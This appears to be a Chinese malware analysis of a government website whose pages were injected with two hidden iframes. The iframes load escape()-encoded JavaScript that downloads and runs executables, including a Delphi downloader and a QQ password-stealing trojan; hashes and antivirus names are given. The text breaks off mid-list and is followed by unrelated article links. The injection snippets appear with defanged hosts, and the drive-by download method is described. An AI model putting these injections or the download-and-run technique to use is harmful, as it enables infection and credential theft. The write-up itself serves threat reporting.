下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站

简介: 下载Trojan-PSW.Win32.QQPass.ra等恶意程序的政府网站

网页首部被加入两段代码:

代码段1:

/---------
<iframe height=0 width=0 src="hxxp://ip-ie.www***113.cnidc.cn/w***m/"></iframe>
----------/

w***m.htm的内容为的内容为 escape( ) 加密的代码,解密后的内容为 JavaScript 脚本程序,利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/111.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。

代码段2:

/---------
<iframe height=0 width=0 src="hxxp://www.z***zy***qr.com.**/f***j/wm**.htm/"></iframe>
----------/

wm**.htm  的内容为 escape( ) 加密的代码,解密后的内容为一段 JavaScript脚本程序,也是利用 Microsoft.XMLHTTP、Adodb.Stream 下载 /mc/game/fj.exe,保存为 c:/boot.exe,通过Shell.Application 的 ShellExecute方法 运行。

fj.exe 采用 Borland Delphi Setup Module 制作,

/---------

获取文件版本信息大小失败!

创建时间 : 2006-12-1 20:42:53

大小 : 15872 字节 15.512 KB

MD5 : 945db5a79cf5e1a0cf097cbb30af858e

---------/

Kaspersky 报为 Trojan-Downloader.Win32.Delf.ajm。

fj.exe 会从同一网站下载下列文件:

1)/mc/bao/fujia.exe

,采用UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo 制作,

/---------

大小 : 39069 字节 38.157 KB

MD5 : 9ac6f3cb5741973297c2be2b282f19b9

---------/

Kaspersky 报为 Trojan-PSW.Win32.QQPass.ra。

2)/mc/pqpq.exe

采用nSPack 1.3 -> North Star/Liu Xing Ping 加壳。

/---------


相关文章
|
双11
29 岁成为阿里巴巴P8,工作前5年完成晋升3连跳,他如何做到?
泡泡是我的好朋友。今年31岁,毕业后就进了阿里巴巴,工作五年内从P4晋升至 P6、P7、P8。
5427 0
|
4月前
|
开发者
1688工厂信息接口指南
1688工厂信息接口用于获取供应商基础信息、生产能力及交易信用数据,支持供应链分析与评估。核心功能包括企业信息、生产能力、交易勋章、认证资料等。调用需申请接口权限,配置商品ID与返回字段。
抖音私信插件批量无限,导入UID抖音号群发私信,关注功能自带按键精灵
这是一款针对抖音主播的精准私信工具源码,适用于微商或化妆品销售者。通过模拟用户行为,自动向抖音主播发送私信,提升销售额。
|
9月前
|
虚拟化 iOS开发 MacOS
VMware ESXi 7.0U3r macOS Unlocker & OEM BIOS 2.7 集成网卡驱动和 NVMe 驱动 (集成驱动版)
VMware ESXi 7.0U3r macOS Unlocker & OEM BIOS 2.7 集成网卡驱动和 NVMe 驱动 (集成驱动版)
221 0
VMware ESXi 7.0U3r macOS Unlocker & OEM BIOS 2.7 集成网卡驱动和 NVMe 驱动 (集成驱动版)
|
机器学习/深度学习 人工智能 数据挖掘
【机器学习】贝叶斯统计中,“先验概率”和“后验概率”的区别?
【5月更文挑战第11天】【机器学习】贝叶斯统计中,“先验概率”和“后验概率”的区别?
|
安全 网络安全 数据安全/隐私保护
|
算法 Linux 调度
深入探索安卓系统的多任务处理机制
【10月更文挑战第21天】 本文旨在为读者提供一个关于Android系统多任务处理机制的全面解析。我们将从Android操作系统的核心架构出发,探讨其如何管理多个应用程序的同时运行,包括进程调度、内存管理和电量优化等方面。通过深入分析,本文揭示了Android在处理多任务时所面临的挑战以及它如何通过创新的解决方案来提高用户体验和设备性能。
683 1
|
人工智能 编解码 安全
【最新】Sora到底是什么?Sora详解:一文带你熟悉Sora
《Sora详解:一文带你熟悉Sora,以及Sora新手小白使用教程》是一篇深入介绍OpenAI最新文本生成视频大模型Sora的文章。它探讨了Sora的定义、功能和使用方法,为读者提供了全面了解和上手Sora的指南。这篇文章旨在帮助新手快速掌握Sora,并展示其在视频创作领域的潜力。
798 0
【最新】Sora到底是什么?Sora详解:一文带你熟悉Sora
|
人工智能 监控 数据处理
【AI大模型应用开发】【LangSmith: 生产级AI应用维护平台】1. 快速上手数据集与测试评估过程
【AI大模型应用开发】【LangSmith: 生产级AI应用维护平台】1. 快速上手数据集与测试评估过程
436 0
|
监控 网络协议 网络架构
Modbus Slave学习笔记(一)
Modbus Slave学习笔记